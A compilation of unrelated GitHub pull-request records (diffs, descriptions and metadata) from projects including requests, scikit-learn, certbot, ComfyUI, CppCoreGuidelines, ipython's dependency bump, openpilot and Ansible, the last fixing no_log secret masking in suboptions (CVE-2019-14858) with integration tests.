+ requests.put('http://google.com', {})
+ mock_request.assert_called_once_with('put', 'http://google.com',
+ data= {})
+
+ @mock.patch('requests.api.request')
+ def test_http_patch(self, mock_request):
+ mock_request.return_value = Response()
+ requests.patch('http://google.com', {})
+ mock_request.assert_called_once_with('patch', 'http://google.com',
+ data= {})
+
+ @mock.patch('requests.api.request')
+ def test_http_delete(self, mock_request):
+ mock_request.return_value = Response()
+ requests.delete('http://google.com')
+ mock_request.assert_called_once_with('delete', 'http://google.com')
+
+if __name__ == '__main__':
+ unittest.main()
| This might be somewhat related to issue #153. I think it would make sense to split up testing into a unit testing and an integration testing part (loosely defined). In the unit tests the actual methods are tested with everything mocked out. This way we can be sure that the respective external methods are always called with the right arguments. In the integration testing suite it is allowed to call external entities (like `httpbin.org`) for testing the overall function. So I just moved the existing tests there.
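
As a rough, hypothetical sketch of that split (not part of this PR; `fetch_status` is an invented helper standing in for any code that talks to the network, and the modern stdlib `unittest.mock` stands in for the `mock` package):

```python
import unittest
from unittest import mock

import requests


def fetch_status(url, session=None):
    # Invented helper whose collaborator (the session) can be mocked out.
    session = session or requests.Session()
    return session.get(url, timeout=10).status_code


class FetchStatusUnitTest(unittest.TestCase):
    def test_delegates_to_session_get(self):
        # Unit flavour: the session is a mock, nothing leaves the process,
        # and we only assert the collaborator got the right arguments.
        session = mock.Mock()
        session.get.return_value = mock.Mock(status_code=200)
        self.assertEqual(fetch_status("http://example.com", session), 200)
        session.get.assert_called_once_with("http://example.com", timeout=10)


class FetchStatusIntegrationTest(unittest.TestCase):
    def test_against_httpbin(self):
        # Integration flavour: a real HTTP round trip to an external host.
        self.assertEqual(fetch_status("https://httpbin.org/get"), 200)


if __name__ == "__main__":
    unittest.main()
```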
I have restructured the test organization a bit and added some basic unit tests for the `api` module. However, I would like to get your feedback on this before going on, as this will definitely be some work and will take a while to reach a reasonable level of coverage.
| https://api.github.com/repos/psf/requests/pulls/166 | 2011-09-15T22:44:14Z | 2011-09-16T02:30:33Z | 2011-09-16T02:30:33Z | 2021-09-08T12:01:25Z | 618 | psf/requests | 32,378 |
[MRG+1] FIX out of bounds array access in SAGA | diff --git a/sklearn/linear_model/sag_fast.pyx b/sklearn/linear_model/sag_fast.pyx
index 8c370db7e3b1e..592b0f497b4b1 100644
--- a/sklearn/linear_model/sag_fast.pyx
+++ b/sklearn/linear_model/sag_fast.pyx
@@ -614,10 +614,14 @@ cdef void lagged_update(double* weights, double wscale, int xnnz,
last_update_ind = sample_itr - 1
for lagged_ind in range(sample_itr - 1,
last_update_ind - 1, -1):
- grad_step = (cumulative_sums[lagged_ind]
- - cumulative_sums[lagged_ind - 1])
- prox_step = (cumulative_sums_prox[lagged_ind]
- - cumulative_sums_prox[lagged_ind - 1])
+ if lagged_ind > 0:
+ grad_step = (cumulative_sums[lagged_ind]
+ - cumulative_sums[lagged_ind - 1])
+ prox_step = (cumulative_sums_prox[lagged_ind]
+ - cumulative_sums_prox[lagged_ind - 1])
+ else:
+ grad_step = cumulative_sums[lagged_ind]
+ prox_step = cumulative_sums_prox[lagged_ind]
weights[idx] -= sum_gradient[idx] * grad_step
weights[idx] = _soft_thresholding(weights[idx],
prox_step)
| Fixes #9351 (random inconsistencies between SAGA and liblinear LogisticRegression on OS X).
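
For context, the patch guards the `lagged_ind == 0` case so the loop never computes `cumulative_sums[lagged_ind - 1]` with a negative index. A rough pure-Python sketch of the corrected step computation (illustrative only, not the library's Cython code):

```python
# In the real Cython code, cumulative_sums is a raw double* and reading
# index -1 is an out-of-bounds access into arbitrary memory, not Python-style
# wrap-around indexing; the guard below avoids it.
def grad_step(cumulative_sums, lagged_ind):
    if lagged_ind > 0:
        return cumulative_sums[lagged_ind] - cumulative_sums[lagged_ind - 1]
    # lagged_ind == 0: the running sum "before" the first entry is 0.
    return cumulative_sums[lagged_ind]


steps = [0.5, 1.25, 2.0]  # toy cumulative step sizes
assert grad_step(steps, 0) == 0.5
assert grad_step(steps, 2) == 0.75
```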
To hedge my bets that this is the right fix, I'll ping @tomdlt, @arthurmensch, @dsullivan7. | https://api.github.com/repos/scikit-learn/scikit-learn/pulls/9376 | 2017-07-16T13:49:48Z | 2017-07-17T08:49:56Z | 2017-07-17T08:49:55Z | 2017-07-17T08:56:25Z | 342 | scikit-learn/scikit-learn | 46,577 |
Move our macOS tests to Azure Pipelines | diff --git a/.azure-pipelines/templates/tests-suite.yml b/.azure-pipelines/templates/tests-suite.yml
index 119f755a6fb..069ea94d62f 100644
--- a/.azure-pipelines/templates/tests-suite.yml
+++ b/.azure-pipelines/templates/tests-suite.yml
@@ -1,22 +1,36 @@
jobs:
- job: test
- pool:
- vmImage: vs2017-win2016
strategy:
matrix:
- py35:
+ macos-py27:
+ IMAGE_NAME: macOS-10.14
+ PYTHON_VERSION: 2.7
+ TOXENV: py27
+ macos-py38:
+ IMAGE_NAME: macOS-10.14
+ PYTHON_VERSION: 3.8
+ TOXENV: py38
+ windows-py35:
+ IMAGE_NAME: vs2017-win2016
PYTHON_VERSION: 3.5
TOXENV: py35
- py37-cover:
+ windows-py37-cover:
+ IMAGE_NAME: vs2017-win2016
PYTHON_VERSION: 3.7
TOXENV: py37-cover
- integration-certbot:
+ windows-integration-certbot:
+ IMAGE_NAME: vs2017-win2016
PYTHON_VERSION: 3.7
TOXENV: integration-certbot
PYTEST_ADDOPTS: --numprocesses 4
+ pool:
+ vmImage: $(IMAGE_NAME)
variables:
- group: certbot-common
steps:
+ - bash: brew install augeas
+ condition: startswith(variables['IMAGE_NAME'], 'macOS')
+ displayName: Install Augeas
- task: UsePythonVersion@0
inputs:
versionSpec: $(PYTHON_VERSION)
diff --git a/.travis.yml b/.travis.yml
index 1eae66333b3..e5354898d52 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -6,7 +6,6 @@ cache:
- $HOME/.cache/pip
before_script:
- - 'if [[ "$TRAVIS_OS_NAME" == "osx" ]]; then ulimit -n 1024 ; fi'
# On Travis, the fastest parallelization for integration tests has proved to be 4.
- 'if [[ "$TOXENV" == *"integration"* ]]; then export PYTEST_ADDOPTS="--numprocesses 4"; fi'
# Use Travis retry feature for farm tests since they are flaky
@@ -224,24 +223,6 @@ matrix:
packages: # don't install nginx and apache
- libaugeas0
<<: *extended-test-suite
- - language: generic
- env: TOXENV=py27
- os: osx
- addons:
- homebrew:
- packages:
- - augeas
- - python2
- <<: *extended-test-suite
- - language: generic
- env: TOXENV=py3
- os: osx
- addons:
- homebrew:
- packages:
- - augeas
- - python3
- <<: *extended-test-suite
# container-based infrastructure
sudo: false
| [Our macOS tests are failing](https://travis-ci.com/certbot/certbot/builds/149965318) again, this time due to the problem described at https://travis-ci.community/t/macos-build-fails-because-of-homebrew-bundle-unknown-command/7296/14.
I tried adding `update: true` to the Homebrew config as described in that thread, but [it didn't work](https://travis-ci.com/certbot/certbot/builds/150070374). I also tried updating the macOS image we use which [didn't work](https://travis-ci.com/certbot/certbot/builds/150072389).
Since we continue to have problems with macOS on Travis, let's try moving the tests to Azure Pipelines. | https://api.github.com/repos/certbot/certbot/pulls/7793 | 2020-02-21T18:42:52Z | 2020-02-21T19:18:54Z | 2020-02-21T19:18:54Z | 2020-02-21T19:20:47Z | 741 | certbot/certbot | 3,761 |
Use window.name instead of session storage | diff --git a/web/scripts/api.js b/web/scripts/api.js
index 2b90c2abc8..d29faa5bae 100644
--- a/web/scripts/api.js
+++ b/web/scripts/api.js
@@ -35,7 +35,7 @@ class ComfyApi extends EventTarget {
}
let opened = false;
- let existingSession = sessionStorage["Comfy.SessionId"] || "";
+ let existingSession = window.name;
if (existingSession) {
existingSession = "?clientId=" + existingSession;
}
@@ -75,7 +75,7 @@ class ComfyApi extends EventTarget {
case "status":
if (msg.data.sid) {
this.clientId = msg.data.sid;
- sessionStorage["Comfy.SessionId"] = this.clientId;
+ window.name = this.clientId;
}
this.dispatchEvent(new CustomEvent("status", { detail: msg.data.status }));
break;
| Prevents "Duplicate Tab" stealing session id, fixes #549
I've tested with Firefox, Chrome, Colab local tunnel | https://api.github.com/repos/comfyanonymous/ComfyUI/pulls/555 | 2023-04-23T09:37:39Z | 2023-04-23T17:02:22Z | 2023-04-23T17:02:21Z | 2023-04-28T07:28:37Z | 210 | comfyanonymous/ComfyUI | 17,832 |
R.5 (scoped objects): Do not warn on a const `unique_ptr<T[]>` | diff --git a/CppCoreGuidelines.md b/CppCoreGuidelines.md
index d9a7cf328..939e74c80 100644
--- a/CppCoreGuidelines.md
+++ b/CppCoreGuidelines.md
@@ -9550,6 +9550,28 @@ Instead, use a local variable:
* (Moderate) Warn if an object is allocated and then deallocated on all paths within a function. Suggest it should be a local `auto` stack object instead.
* (Simple) Warn if a local `Unique_pointer` or `Shared_pointer` is not moved, copied, reassigned or `reset` before its lifetime ends.
+Exception: Do not produce such a warning on a local `Unique_pointer` to an unbounded array. (See below.)
+
+##### Exception
+
+It is OK to create a local `const unique_ptr<T[]>` to a heap-allocated buffer, as this is a valid way to represent a scoped dynamic array.
+
+##### Example
+
+A valid use case for a local `const unique_ptr<T[]>` variable:
+
+ int get_median_value(const std::list<int>& integers)
+ {
+ const auto size = integers.size();
+
+ // OK: declaring a local unique_ptr<T[]>.
+ const auto local_buffer = std::make_unique_for_overwrite<int[]>(size);
+
+ std::copy_n(begin(integers), size, local_buffer.get());
+ std::nth_element(local_buffer.get(), local_buffer.get() + size/2, local_buffer.get() + size);
+
+ return local_buffer[size/2];
+ }
### <a name="Rr-global"></a>R.6: Avoid non-`const` global variables
| `unique_ptr<T[]>` is being used in practice to declare a local dynamically allocated buffer, for example:
const auto local_buffer = std::make_unique_for_overwrite<int[]>(size);
Especially when the `unique_ptr` is declared "const", a warning that it is not moved, copied, reassigned or `reset` does not appear suitable.
----
For the record, here is a complete code example, using such a local `Unique_pointer` ~~(not included with the proposed commit)~~:
```
int get_median_value(const std::list<int>& integers)
{
const auto size = integers.size();
const auto local_buffer = std::make_unique_for_overwrite<int[]>(size);
std::copy_n(begin(integers), size, local_buffer.get());
std::nth_element(local_buffer.get(), local_buffer.get() + size/2, local_buffer.get() + size);
return local_buffer[size/2];
}
```
----
Update: the code example above here is now part of the proposed text itself, as requested by Herb Sutter at https://github.com/isocpp/CppCoreGuidelines/pull/1969#issuecomment-1255555334 | https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/1969 | 2022-08-31T12:45:53Z | 2022-10-13T21:08:53Z | 2022-10-13T21:08:53Z | 2022-10-13T21:08:53Z | 372 | isocpp/CppCoreGuidelines | 16,110 |
Bump ipython from 8.9.0 to 8.10.0 | diff --git a/requirements.txt b/requirements.txt
index 11ee47eb5f86f..fc1e2aeaf7c65 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -6,7 +6,7 @@ pytest-dotenv==0.5.2
# third-party (libraries)
rake_nltk==1.0.6
-ipython==8.9.0
+ipython==8.10.0
# linting stubs
types-requests==2.28.11.8
| Bumps [ipython](https://github.com/ipython/ipython) from 8.9.0 to 8.10.0.
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/ipython/ipython/commit/15ea1ed5a886d6c19c1cc4856f2cf04a2a547c57"><code>15ea1ed</code></a> release 8.10.0</li>
<li><a href="https://github.com/ipython/ipython/commit/560ad109197c0f8373865896af369bb3b36fd229"><code>560ad10</code></a> DOC: Update what's new for 8.10 (<a href="https://github-redirect.dependabot.com/ipython/ipython/issues/13939">#13939</a>)</li>
<li><a href="https://github.com/ipython/ipython/commit/7557ade0ed927475d5ab5b573d0ea4febfb22683"><code>7557ade</code></a> DOC: Update what's new for 8.10</li>
<li><a href="https://github.com/ipython/ipython/commit/385d69325319a5972ee9b5983638e3617f21cb1f"><code>385d693</code></a> Merge pull request from GHSA-29gw-9793-fvw7</li>
<li><a href="https://github.com/ipython/ipython/commit/e548ee23ac460a99901f1cd43b94ae84a35ec393"><code>e548ee2</code></a> Swallow potential exceptions from showtraceback() (<a href="https://github-redirect.dependabot.com/ipython/ipython/issues/13934">#13934</a>)</li>
<li><a href="https://github.com/ipython/ipython/commit/0694b08b436203817059ec7e7136cf8561a6f013"><code>0694b08</code></a> MAINT: mock slowest test. (<a href="https://github-redirect.dependabot.com/ipython/ipython/issues/13885">#13885</a>)</li>
<li><a href="https://github.com/ipython/ipython/commit/865591252a67c6907fe03228b4053305715286e6"><code>8655912</code></a> MAINT: mock slowest test.</li>
<li><a href="https://github.com/ipython/ipython/commit/a011765b44febfb11bae122d2ed7db763621ac8f"><code>a011765</code></a> Isolate the attack tests with setUp and tearDown methods</li>
<li><a href="https://github.com/ipython/ipython/commit/c7a9470e540392c575aac46c3ee5cf4fe5123eb1"><code>c7a9470</code></a> Add some regression tests for this change</li>
<li><a href="https://github.com/ipython/ipython/commit/fd34cf5f1f6e243243c738c6e0cf62eb682c4d68"><code>fd34cf5</code></a> Swallow potential exceptions from showtraceback()</li>
<li>Additional commits viewable in <a href="https://github.com/ipython/ipython/compare/8.9.0...8.10.0">compare view</a></li>
</ul>
</details>
<br />
[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=ipython&package-manager=pip&previous-version=8.9.0&new-version=8.10.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
- `@dependabot use these labels` will set the current labels as the default for future PRs for this repo and language
- `@dependabot use these reviewers` will set the current reviewers as the default for future PRs for this repo and language
- `@dependabot use these assignees` will set the current assignees as the default for future PRs for this repo and language
- `@dependabot use this milestone` will set the current milestone as the default for future PRs for this repo and language
You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/jerryjliu/gpt_index/network/alerts).
</details> | https://api.github.com/repos/run-llama/llama_index/pulls/444 | 2023-02-14T08:36:10Z | 2023-02-14T08:39:32Z | 2023-02-14T08:39:32Z | 2023-02-14T08:39:33Z | 123 | run-llama/llama_index | 6,470 |
Hyundai: Add FW Versions for Elantra 2023 | diff --git a/docs/CARS.md b/docs/CARS.md
index 0d4c53ac015e11..4a46360d4f861c 100644
--- a/docs/CARS.md
+++ b/docs/CARS.md
@@ -57,7 +57,7 @@ A supported vehicle is one that just works when you install a comma three. All s
|Honda|Pilot 2016-22|Honda Sensing|openpilot|25 mph|12 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Honda&model=Pilot 2016-22">Honda Nidec</a>||
|Honda|Ridgeline 2017-22|Honda Sensing|openpilot|25 mph|12 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Honda&model=Ridgeline 2017-22">Honda Nidec</a>||
|Hyundai|Elantra 2017-19|Smart Cruise Control (SCC)|Stock|19 mph|32 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Elantra 2017-19">Hyundai B</a>||
-|Hyundai|Elantra 2021-22|Smart Cruise Control (SCC)|openpilot available[<sup>1</sup>](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Elantra 2021-22">Hyundai K</a>|<a href="https://youtu.be/_EdYQtV52-c" target="_blank"><img height="18px" src="assets/icon-youtube.svg"></img></a>|
+|Hyundai|Elantra 2021-23|Smart Cruise Control (SCC)|openpilot available[<sup>1</sup>](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Elantra 2021-23">Hyundai K</a>|<a href="https://youtu.be/_EdYQtV52-c" target="_blank"><img height="18px" src="assets/icon-youtube.svg"></img></a>|
|Hyundai|Elantra GT 2017-19|Smart Cruise Control (SCC)|Stock|0 mph|32 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Elantra GT 2017-19">Hyundai E</a>||
|Hyundai|Elantra Hybrid 2021-23|Smart Cruise Control (SCC)|openpilot available[<sup>1</sup>](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Elantra Hybrid 2021-23">Hyundai K</a>|<a href="https://youtu.be/_EdYQtV52-c" target="_blank"><img height="18px" src="assets/icon-youtube.svg"></img></a>|
|Hyundai|Genesis 2015-16|Smart Cruise Control (SCC)|Stock|19 mph|37 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Genesis 2015-16">Hyundai J</a>||
diff --git a/selfdrive/car/hyundai/values.py b/selfdrive/car/hyundai/values.py
index 31cbe68d1366a6..b3cb46699ad3ba 100644
--- a/selfdrive/car/hyundai/values.py
+++ b/selfdrive/car/hyundai/values.py
@@ -145,7 +145,7 @@ def init_make(self, CP: car.CarParams):
HyundaiCarInfo("Hyundai Elantra GT 2017-19", harness=Harness.hyundai_e),
HyundaiCarInfo("Hyundai i30 2017-19", harness=Harness.hyundai_e),
],
- CAR.ELANTRA_2021: HyundaiCarInfo("Hyundai Elantra 2021-22", video_link="https://youtu.be/_EdYQtV52-c", harness=Harness.hyundai_k),
+ CAR.ELANTRA_2021: HyundaiCarInfo("Hyundai Elantra 2021-23", video_link="https://youtu.be/_EdYQtV52-c", harness=Harness.hyundai_k),
CAR.ELANTRA_HEV_2021: HyundaiCarInfo("Hyundai Elantra Hybrid 2021-23", video_link="https://youtu.be/_EdYQtV52-c", harness=Harness.hyundai_k),
CAR.HYUNDAI_GENESIS: HyundaiCarInfo("Hyundai Genesis 2015-16", min_enable_speed=19 * CV.MPH_TO_MS, harness=Harness.hyundai_j), # TODO: check 2015 packages
CAR.IONIQ: HyundaiCarInfo("Hyundai Ioniq Hybrid 2017-19", harness=Harness.hyundai_c),
@@ -1322,25 +1322,26 @@ class Buttons:
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00CN7_ SCC F-CUP 1.00 1.01 99110-AA000 ',
b'\xf1\x00CN7_ SCC FHCUP 1.00 1.01 99110-AA000 ',
+ b'\xf1\x00CN7_ SCC FNCUP 1.00 1.01 99110-AA000 ',
b'\xf1\x8799110AA000\xf1\x00CN7_ SCC FHCUP 1.00 1.01 99110-AA000 ',
b'\xf1\x8799110AA000\xf1\x00CN7_ SCC F-CUP 1.00 1.01 99110-AA000 ',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1\x00CN7 MDPS C 1.00 1.06 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 4CNDC106',
b'\xf1\x8756310/AA070\xf1\x00CN7 MDPS C 1.00 1.06 56310/AA070 4CNDC106',
- b'\xf1\x8756310AA050\x00\xf1\x00CN7 MDPS C 1.00 1.06 56310AA050\x00 4CNDC106',
b'\xf1\x8756310AA050\x00\xf1\x00CN7 MDPS C 1.00 1.06 56310AA050\x00 4CNDC106\xf1\xa01.06',
+ b'\xf1\x00CN7 MDPS C 1.00 1.06 56310AA050\x00 4CNDC106',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00CN7 MFC AT USA LHD 1.00 1.00 99210-AB000 200819',
b'\xf1\x00CN7 MFC AT USA LHD 1.00 1.03 99210-AA000 200819',
b'\xf1\x00CN7 MFC AT USA LHD 1.00 1.01 99210-AB000 210205',
b'\xf1\x00CN7 MFC AT USA LHD 1.00 1.06 99210-AA000 220111',
+ b'\xf1\x00CN7 MFC AT USA LHD 1.00 1.03 99210-AB000 220426',
],
(Ecu.abs, 0x7d1, None): [
b'\xf1\x00CN ESC \t 101 \x10\x03 58910-AB800',
b'\xf1\x8758910-AA800\xf1\x00CN ESC \t 104 \x08\x03 58910-AA800',
- b'\xf1\x8758910-AB800\xf1\x00CN ESC \t 101 \x10\x03 58910-AB800',
b'\xf1\x8758910-AA800\xf1\x00CN ESC \t 105 \x10\x03 58910-AA800',
b'\xf1\x8758910-AB800\xf1\x00CN ESC \t 101 \x10\x03 58910-AB800\xf1\xa01.01',
],
@@ -1358,6 +1359,7 @@ class Buttons:
b'\xf1\x81HM6M2_0a0_FF0',
b'\xf1\x82CNCVD0AMFCXCSFFB',
b'\xf1\x870\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1\x81HM6M2_0a0_G80',
+ b'\xf1\x870\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1\x81HM6M2_0a0_HC0',
],
},
CAR.ELANTRA_HEV_2021: {
| Add firmware for the 2023 Hyundai Elantra. Expand supported model-year range up to 2023.
Route ID: `5bd4c9ea08bd24af|2022-12-22--23-42-20`
Thanks to community 2023 Hyundai Elantra owner `drewparks7#0148` (Discord). | https://api.github.com/repos/commaai/openpilot/pulls/27026 | 2023-01-21T03:23:54Z | 2023-01-25T00:11:13Z | 2023-01-25T00:11:13Z | 2023-04-25T22:04:48Z | 2,307 | commaai/openpilot | 8,908 |
DOC Update release checklist regarding SECURITY.md | diff --git a/doc/developers/maintainer.rst b/doc/developers/maintainer.rst
index 1b79fbd3c282c..54b75a96b6360 100644
--- a/doc/developers/maintainer.rst
+++ b/doc/developers/maintainer.rst
@@ -301,7 +301,6 @@ The following GitHub checklist might be helpful in a release PR::
* [ ] update news and what's new date in release branch
* [ ] update news and what's new date and sklearn dev0 version in main branch
- * [ ] update SECURITY.md in release and main branch
* [ ] check that the wheels for the release can be built successfully
* [ ] merge the PR with `[cd build]` commit message to upload wheels to the staging repo
* [ ] upload the wheels and source tarball to https://test.pypi.org
@@ -311,6 +310,7 @@ The following GitHub checklist might be helpful in a release PR::
* [ ] upload the wheels and source tarball to PyPI
* [ ] https://github.com/scikit-learn/scikit-learn/releases publish (except for RC)
* [ ] announce on mailing list and on Twitter, and LinkedIn
+ * [ ] update SECURITY.md in main branch (except for RC)
Merging Pull Requests
---------------------
| Follow-up of https://github.com/scikit-learn/scikit-learn/pull/25047
SECURITY.md is bound to the github repo. There's no need to update it in the release branch (it's not shipped in the wheels anyway). We only need to update it once the final release for a version (minor or major) is online. | https://api.github.com/repos/scikit-learn/scikit-learn/pulls/25122 | 2022-12-06T16:50:02Z | 2022-12-06T18:02:44Z | 2022-12-06T18:02:44Z | 2022-12-06T18:02:44Z | 298 | scikit-learn/scikit-learn | 46,877 |
[stable-2.7] Properly mask no_log values is sub parameters during failure (#63405) | diff --git a/changelogs/fragments/no-log-sub-options-invalid-parameter.yaml b/changelogs/fragments/no-log-sub-options-invalid-parameter.yaml
new file mode 100644
index 00000000000000..79019d64cfeed9
--- /dev/null
+++ b/changelogs/fragments/no-log-sub-options-invalid-parameter.yaml
@@ -0,0 +1,2 @@
+bugfixes:
+ - '**security issue** - properly hide parameters marked with ``no_log`` in suboptions when invalid parameters are passed to the module (CVE-2019-14858)'
diff --git a/lib/ansible/module_utils/basic.py b/lib/ansible/module_utils/basic.py
index 2b33aa3ee985f7..d2a43e7f87c844 100644
--- a/lib/ansible/module_utils/basic.py
+++ b/lib/ansible/module_utils/basic.py
@@ -1665,6 +1665,34 @@ def _handle_no_log_values(self, spec=None, param=None):
if no_log_object:
self.no_log_values.update(return_values(no_log_object))
+ # Get no_log values from suboptions
+ sub_argument_spec = arg_opts.get('options')
+ if sub_argument_spec is not None:
+ wanted_type = arg_opts.get('type')
+ sub_parameters = param.get(arg_name)
+
+ if sub_parameters is not None:
+ if wanted_type == 'dict' or (wanted_type == 'list' and arg_opts.get('elements', '') == 'dict'):
+ # Sub parameters can be a dict or list of dicts. Ensure parameters are always a list.
+ if not isinstance(sub_parameters, list):
+ sub_parameters = [sub_parameters]
+
+ for sub_param in sub_parameters:
+ # Validate dict fields in case they came in as strings
+
+ if isinstance(sub_param, string_types):
+ sub_param = self._check_type_dict(sub_param)
+
+ try:
+ if not isinstance(sub_param, Mapping):
+ raise TypeError("Value '{1}' in the sub parameter field '{0}' must by a {2}, "
+ "not '{1.__class__.__name__}'".format(arg_name, sub_param, wanted_type))
+ except TypeError as te:
+ self.fail_json(msg="Failure when processing no_log parameters. Module invocation will be hidden. "
+ "%s" % to_native(te), invocation={'module_args': 'HIDDEN DUE TO FAILURE'})
+
+ self._handle_no_log_values(sub_argument_spec, sub_param)
+
if arg_opts.get('removed_in_version') is not None and arg_name in param:
self._deprecations.append({
'msg': "Param '%s' is deprecated. See the module docs for more information" % arg_name,
@@ -2032,7 +2060,6 @@ def _handle_options(self, argument_spec=None, params=None):
self._set_fallbacks(spec, param)
options_aliases = self._handle_aliases(spec, param)
- self._handle_no_log_values(spec, param)
options_legal_inputs = list(spec.keys()) + list(options_aliases.keys())
self._check_arguments(self.check_invalid_arguments, spec, param, options_legal_inputs)
diff --git a/test/integration/targets/no_log/library/module.py b/test/integration/targets/no_log/library/module.py
new file mode 100644
index 00000000000000..d4f3c565cff9c0
--- /dev/null
+++ b/test/integration/targets/no_log/library/module.py
@@ -0,0 +1,45 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+# Copyright (c) 2019 Ansible Project
+# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
+
+from __future__ import absolute_import, division, print_function
+__metaclass__ = type
+
+from ansible.module_utils.basic import AnsibleModule
+
+
+def main():
+ module = AnsibleModule(
+ argument_spec={
+ 'state': {},
+ 'secret': {'no_log': True},
+ 'subopt_dict': {
+ 'type': 'dict',
+ 'options': {
+ 'str_sub_opt1': {'no_log': True},
+ 'str_sub_opt2': {},
+ 'nested_subopt': {
+ 'type': 'dict',
+ 'options': {
+ 'n_subopt1': {'no_log': True},
+ }
+ }
+ }
+ },
+ 'subopt_list': {
+ 'type': 'list',
+ 'elements': 'dict',
+ 'options': {
+ 'subopt1': {'no_log': True},
+ 'subopt2': {},
+ }
+ }
+
+ }
+ )
+ module.exit_json(msg='done')
+
+
+if __name__ == '__main__':
+ main()
diff --git a/test/integration/targets/no_log/no_log_local.yml b/test/integration/targets/no_log/no_log_local.yml
index aacf7de27699f2..41b1858e62b6c6 100644
--- a/test/integration/targets/no_log/no_log_local.yml
+++ b/test/integration/targets/no_log/no_log_local.yml
@@ -47,6 +47,7 @@
poll: 1
shell: echo "DO_NOT_LOG_ASYNC_TASK_SUCCEEDED"
no_log: true
+ ignore_errors: yes
- name: play-level no_log set
hosts: testhost
diff --git a/test/integration/targets/no_log/no_log_suboptions.yml b/test/integration/targets/no_log/no_log_suboptions.yml
new file mode 100644
index 00000000000000..e67ecfe21b5993
--- /dev/null
+++ b/test/integration/targets/no_log/no_log_suboptions.yml
@@ -0,0 +1,24 @@
+- name: test no log with suboptions
+ hosts: testhost
+ gather_facts: no
+
+ tasks:
+ - name: Task with suboptions
+ module:
+ secret: GLAMOROUS
+ subopt_dict:
+ str_sub_opt1: AFTERMATH
+ str_sub_opt2: otherstring
+ nested_subopt:
+ n_subopt1: MANPOWER
+
+ subopt_list:
+ - subopt1: UNTAPPED
+ subopt2: thridstring
+
+ - subopt1: CONCERNED
+
+ - name: Task with suboptions as string
+ module:
+ secret: MARLIN
+ subopt_dict: str_sub_opt1=FLICK
diff --git a/test/integration/targets/no_log/no_log_suboptions_invalid.yml b/test/integration/targets/no_log/no_log_suboptions_invalid.yml
new file mode 100644
index 00000000000000..933a8a9bb2723d
--- /dev/null
+++ b/test/integration/targets/no_log/no_log_suboptions_invalid.yml
@@ -0,0 +1,45 @@
+- name: test no log with suboptions
+ hosts: testhost
+ gather_facts: no
+ ignore_errors: yes
+
+ tasks:
+ - name: Task with suboptions and invalid parameter
+ module:
+ secret: SUPREME
+ invalid: param
+ subopt_dict:
+ str_sub_opt1: IDIOM
+ str_sub_opt2: otherstring
+ nested_subopt:
+ n_subopt1: MOCKUP
+
+ subopt_list:
+ - subopt1: EDUCATED
+ subopt2: thridstring
+ - subopt1: FOOTREST
+
+ - name: Task with suboptions as string with invalid parameter
+ module:
+ secret: FOOTREST
+ invalid: param
+ subopt_dict: str_sub_opt1=CRAFTY
+
+ - name: Task with suboptions with dict instead of list
+ module:
+ secret: FELINE
+ subopt_dict:
+ str_sub_opt1: CRYSTAL
+ str_sub_opt2: otherstring
+ nested_subopt:
+ n_subopt1: EXPECTANT
+ subopt_list:
+ foo: bar
+
+ - name: Task with suboptions with incorrect data type
+ module:
+ secret: AGROUND
+ subopt_dict: 9068.21361
+ subopt_list:
+ - subopt1: GOLIATH
+ - subopt1: FREEFALL
